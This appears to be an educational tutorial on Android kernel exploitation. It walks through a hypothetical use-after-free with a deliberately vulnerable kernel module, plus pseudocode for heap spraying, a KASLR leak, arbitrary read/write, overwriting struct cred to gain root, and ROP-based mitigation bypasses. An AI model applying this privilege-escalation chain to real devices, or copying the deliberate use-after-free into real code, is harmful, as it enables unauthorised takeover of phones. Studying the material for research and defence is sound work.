Introduction to Android Kernel Exploitation

The Android operating system, built upon the Linux kernel, is a colossal attack surface. While Google and device manufacturers implement robust security measures, vulnerabilities (CVEs) inevitably emerge, particularly within the kernel. Exploiting these kernel CVEs is often the most potent method for achieving root access, bypassing sandboxes, and gaining full control over an Android device. This article dives deep into the intricate world of Android kernel exploit development, guiding you through the essential concepts and a step-by-step walkthrough of exploiting a hypothetical Use-After-Free (UAF) vulnerability.

Understanding kernel exploitation requires a solid grasp of low-level programming, memory management, and operating system internals. We’ll explore how vulnerabilities are identified, transformed into powerful exploit primitives, and ultimately leveraged for privilege escalation.

Understanding Android Kernel Vulnerabilities and Exploit Primitives

Android kernel vulnerabilities typically fall into several categories, each with unique exploitation challenges:

• Use-After-Free (UAF): A memory corruption vulnerability that occurs when a program attempts to use memory after it has been freed. If the freed memory is subsequently reallocated to another object, an attacker can manipulate the new object’s data by interacting with the stale pointer.
• Out-of-Bounds (OOB) Read/Write: Accessing memory beyond the boundaries of an allocated buffer. This can lead to information leaks or arbitrary memory corruption.
• Integer Overflows/Underflows: Arithmetic operations that exceed the maximum or minimum value representable by an integer type, potentially leading to OOB accesses or incorrect buffer allocations.
• Type Confusion: When a program accesses a resource (e.g., an object, a pointer) using an incompatible type, leading to unexpected behavior and potential memory corruption.

From these vulnerabilities, exploit developers aim to achieve certain ‘primitives’ that are easier to work with:

• Information Leak: Gaining the ability to read arbitrary kernel memory. This is crucial for bypassing mitigations like Kernel Address Space Layout Randomization (KASLR).
• Arbitrary Read/Write: The ultimate goal, allowing an attacker to read from and write to any arbitrary memory address in the kernel. This is the foundation for privilege escalation.
• Code Execution: Injecting and executing attacker-controlled code within kernel mode.

Setting Up Your Exploit Development Environment

A robust environment is critical for kernel exploit development. Here’s a basic setup:

1. AOSP Build Environment: Required to compile custom Android kernels, modules, and user-space binaries. This allows for testing on a controlled device or emulator.
2. Test Device: An unlocked bootloader device (e.g., Pixel) or an Android emulator (like AVD or Android-x86) running a vulnerable kernel version.
3. Debugging Tools:
   • adb and fastboot: Essential for flashing, logging, and interacting with the device.
   • GDB/IDA Pro: For static and dynamic analysis of kernel binaries and modules.
   • Frida/Pwnagotchi: For user-space instrumentation and dynamic analysis, though direct kernel debugging often requires more specialized tools.
   • Kernel Debugging with kgdb: If supported by your kernel, allows for source-level debugging.
4. Kernel Source Code: The exact source code for your target kernel version is invaluable for vulnerability analysis.

Example: Compiling a Custom Kernel Module

Let’s assume you want to test a vulnerability in a custom kernel module. Here’s a simple Makefile and C file:

# Makefile for kernel module
obj-m += vulnerable_module.o
all:
    make -C $(KERNEL_SOURCE) M=$(PWD) modules
clean:
    make -C $(KERNEL_SOURCE) M=$(PWD) clean

// vulnerable_module.c
#include 
#include 
#include 

static char *vulnerable_buffer = NULL;

static int __init vulnerable_init(void)
{
    printk(KERN_INFO "Vulnerable module loaded");
    vulnerable_buffer = kmalloc(64, GFP_KERNEL); // Allocate 64 bytes
    // Simulate UAF: free it immediately, but keep pointer
    kfree(vulnerable_buffer); 
    return 0;
}

static void __exit vulnerable_exit(void)
{
    printk(KERN_INFO "Vulnerable module unloaded");
    // Don't free again, as it's already freed (potential double free if not careful)
}

module_init(vulnerable_init);
module_exit(vulnerable_exit);

MODULE_LICENSE("GPL");
MODULE_AUTHOR("ExploitDev");
MODULE_DESCRIPTION("A module with a simulated UAF");

Case Study: Exploiting a Hypothetical Use-After-Free (UAF)

Let’s walk through exploiting a hypothetical UAF in a driver or module. Our goal: achieve arbitrary read/write, then privilege escalation.

Step 1: Vulnerability Discovery and Analysis (Conceptual)

Imagine we find kernel code that frees an object but retains a pointer to it, which is later used. This could be due to an error in error handling paths or complex state transitions. For instance, a network socket object might be freed when a connection closes, but a deferred workqueue item might still hold a reference and attempt to use it.

Step 2: Information Leak (Bypassing KASLR)

KASLR randomizes kernel base addresses. To achieve arbitrary read/write, we need to know where the kernel and its crucial data structures reside. A UAF can sometimes be turned into an information leak.

Technique: Heap Spraying and Object Reclaim. We free an object (`obj_A`) that contains a pointer we want to read. Immediately after, we spray the kernel heap with many objects (`obj_B`) of the same size. If `obj_B` reclaims the memory of `obj_A`, and `obj_B` has a method to reveal its contents (e.g., through an ioctl), we might be able to read the stale pointer from `obj_A` now residing within `obj_B`. The stale pointer might point to a kernel symbol, leaking its address and thus the KASLR offset.

// Pseudocode for information leak
// 1. Trigger UAF to free obj_A (e.g., through a specific network operation)
ioctl(fd_A, FREE_OBJECT_CMD, &obj_A_id);

// 2. Spray kernel heap with known-content objects (obj_B) of same size
for (i = 0; i < NUM_SPRAY_OBJECTS; i++) {
    fd_B[i] = open("/dev/spray_device");
    ioctl(fd_B[i], ALLOC_OBJECT_CMD, &obj_B_data_with_known_pattern);
}

// 3. Trigger interaction with the stale obj_A pointer
//    If obj_B reclaimed obj_A's memory, this might reveal obj_B's (and thus obj_A's) content
ioctl(fd_A, READ_STALE_POINTER_CMD, &leak_buffer);
// Parse leak_buffer to find kernel address, calculate KASLR base

Step 3: Achieving Arbitrary Read/Write

Once KASLR is bypassed, the UAF can be used to achieve arbitrary read/write. The core idea is to reclaim the freed memory with an object that the attacker can control, typically a fake object (fake_obj) that has a pointer where the attacker can define an arbitrary address.

Heap Grooming: This involves carefully allocating and freeing kernel objects to manipulate the kernel heap’s internal freelist, ensuring that when our target object is freed, its memory is reallocated to an object we control.

// Pseudocode for Arbitrary Read/Write
// 1. Free target_obj (the UAF object)
ioctl(fd_target, FREE_OBJECT_CMD, &target_obj_id);

// 2. Create a 'fake_object' in user-space with a controlled pointer (e.g., `target_addr`)
struct controlled_object {
    unsigned long arbitrary_read_write_ptr;
    // Other fields to match original object layout
};
struct controlled_object *fake_obj = malloc(sizeof(controlled_object));
fake_obj->arbitrary_read_write_ptr = target_addr; // The address we want to read/write

// 3. Trigger kernel allocation that reclaims target_obj's memory with our fake_obj content
//    This might involve another ioctl that takes user-space data and copies it to kernel memory
ioctl(fd_reclaim, ALLOC_WITH_USERDATA_CMD, fake_obj, sizeof(controlled_object));

// 4. Now, any operation on fd_target that uses the 'arbitrary_read_write_ptr'
//    will operate on `target_addr` instead of its original location.
//    Example: a write operation on fd_target might now write to `target_addr`

Step 4: Privilege Escalation

With arbitrary read/write, the path to root is clear: modify the current process’s credentials (`struct cred`).

1. Locate task_struct and cred: Using the information leak, find the address of the current process’s task_struct in kernel memory. The task_struct contains a pointer to the cred structure.
2. Overwrite uid/gid: Read the cred structure into user-space, modify its uid, gid, euid, egid, etc., to 0 (root).
3. Write back cred: Use the arbitrary write primitive to write the modified cred structure back into kernel memory.

// Pseudocode for Privilege Escalation
// 1. Find 'struct cred *' for current task
//    (Requires knowledge of task_struct offset for 'cred' field)
unsigned long current_task_struct_addr = get_current_task_addr(); // From information leak
unsigned long cred_ptr_addr = current_task_struct_addr + TASK_STRUCT_CRED_OFFSET;
unsigned long actual_cred_addr = read_arbitrary_addr(cred_ptr_addr);

// 2. Read cred structure, modify to root (uid=0, gid=0, etc.)
struct cred *my_cred = (struct cred *)malloc(sizeof(struct cred));
read_arbitrary_addr_to_buffer(actual_cred_addr, my_cred, sizeof(struct cred));

my_cred->uid.val = 0;
my_cred->gid.val = 0;
my_cred->euid.val = 0;
my_cred->egid.val = 0;
my_cred->suid.val = 0;
my_cred->sgid.val = 0;
my_cred->cap_inheritable.cap[0] = ~0U; // All capabilities
my_cred->cap_inheritable.cap[1] = ~0U;
my_cred->cap_permitted.cap[0] = ~0U;
my_cred->cap_permitted.cap[1] = ~0U;
my_cred->cap_effective.cap[0] = ~0U;
my_cred->cap_effective.cap[1] = ~0U;
my_cred->cap_bset.cap[0] = ~0U;
my_cred->cap_bset.cap[1] = ~0U;

// 3. Write modified cred structure back
write_buffer_to_arbitrary_addr(actual_cred_addr, my_cred, sizeof(struct cred));

// 4. Verify root access
if (getuid() == 0) {
    printf("Successfully achieved root!n");
    system("/system/bin/sh");
}

Triggering the Exploit

The entire exploit chain (information leak, arbitrary R/W, privilege escalation) is usually packaged into a single user-space application. This application interacts with the vulnerable kernel component (often via ioctl, network sockets, or other system calls) to trigger the UAF, groom the heap, and execute the steps for privilege escalation.

Mitigation Bypasses

Modern Android kernels employ several mitigations:

• KASLR: Bypassed by information leaks.
• SMAP (Supervisor Mode Access Prevention): Prevents kernel from directly accessing user-space memory. Bypassed by using ROP (Return-Oriented Programming) gadgets to temporarily disable SMAP or by manipulating kernel objects to point to kernel-controlled data.
• SMEP (Supervisor Mode Execution Prevention): Prevents kernel from executing code in user-space pages. Bypassed similar to SMAP, often by ROP or by writing shellcode into kernel memory.
• PAN (Privileged Access Never): A hardware-assisted mitigation similar to SMAP/SMEP, providing even stronger protection. Requires specific ROP gadgets or careful memory manipulation to circumvent.

Conclusion

Exploiting Android kernel CVEs is a complex yet rewarding field. It requires a deep understanding of kernel internals, memory management, and various security mitigations. While this walkthrough uses a hypothetical UAF, the methodology — identifying primitives, bypassing mitigations, and escalating privileges — remains consistent across many kernel vulnerabilities. As Android security continues to evolve, so too must the techniques used by exploit developers, pushing the boundaries of what’s possible in the pursuit of understanding and securing these powerful devices.